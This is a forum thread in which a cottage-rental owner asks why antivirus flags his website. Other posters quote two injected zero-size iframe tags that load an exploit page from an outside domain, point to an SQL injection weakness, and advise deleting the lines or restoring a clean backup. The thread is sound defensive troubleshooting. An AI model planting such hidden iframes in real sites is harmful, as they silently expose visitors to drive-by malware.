|
Urgent help regarding malware virus on website
Hi
Ive my own business and website www.goosemirecottages.co.uk and received the following email - Hi I am looking for accommodation in the Lake District and landed on your web site. The following link http://www.goosemirecottages.co.uk/s...pertyID=447176 resulted in a virus report from 2 different anti-virus products. The file in question is hker[1].htm. The suspected virus is called Exploit-MS06-014 (Trojan). Any thoughts? Regards Tony -- Anyway i checked the link and there is a virus which kaspersky picks up, but it seems to be on all of the sites pages. Could the email have been a hoax and downloaded a virus onto the site, any other idea how a virus could be put onto the site and how could it be removed? Thanks for your help |
Not picking up any virus warnings from that URL (that doesn't mean to say that it's "clean" though).
One thing to note straight away, the site is open to SQL injection and therefore anything is possible. Get it secured asap Martin! |
Not really familiar but would you expect to see these two lines of code on your home and other pages.
<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe> <iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe> |
And slightly off topic, did you know that kate@netizen is getting a copy of every "contact us" form filled in?
|
Quote:
FYI Martin, the hker.htm file tries to do some very naughty things: Quote:
|
Would deleting those lines resolve the problem?
Safari BTW. :) |
Quote:
Any number of ways your site could have become infected Martin, but I'd start by first securing the SQL vulnerabilities as people can inject anything they want to your site currently :( Safari ;) |
In any event keep a clean copy to upload and replace the current one if this or any other problem occurs.
|
Can i have a swear filter switched on briefly? :mad: Some spotty gimp will have been sat at home with his porn mags and flask of orange juice all night hatching this evil plan, they should cut their hands off!
Rant over for now... Thanks for the replies guys Rich - what is SQL injection and how do you secure the site from this? (have checked on laptop and got Dad to check site on his PC and all get the same virus warning, all PCs are running Kaspersky, but it cant just be a virus on my system must be within the site pages) -- Greyghost - no those lines of code shouldnt be on the pages, when i go onto the site kaspersky warning window pops up with malware - Exploit.JS.ADODB.Stream.y file - http://www.goldunix.com/hker.htm Which explains the lines of dodgy text you noticed refering to goldunix -- Rich - yes Netizen were the original site designers they get a copy of all enquiry forms so nothing to worry about there (came in handy as when i was with AOL a few years ago they were filtering out loads of the enquiries thinking they were spam emails, in 3 weeks i hadnt received over 100 enquiries, so soon booted AOL out. AOL spam filters see email addresses like [email protected] or [email protected] as spam - Rich again :lol: What exactly are the files trying to do? -- Ok so any idea guys how i remove the nasties and also any idea how they got on the site in the first place and how can it be made more secure? |
Either download the site and delete both lines of code from each page then upload again replacing the live site..
Or remove live site altogether and upload your backup clean copy of your site. It is those two lines that are compromising your site. Rich will advise on protection. |
| All times are GMT. The time now is 01:11. |
Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2024, vBulletin Solutions Inc.
Copyright © 2006-2023, The Rover 75 & MG ZT Owners Club Ltd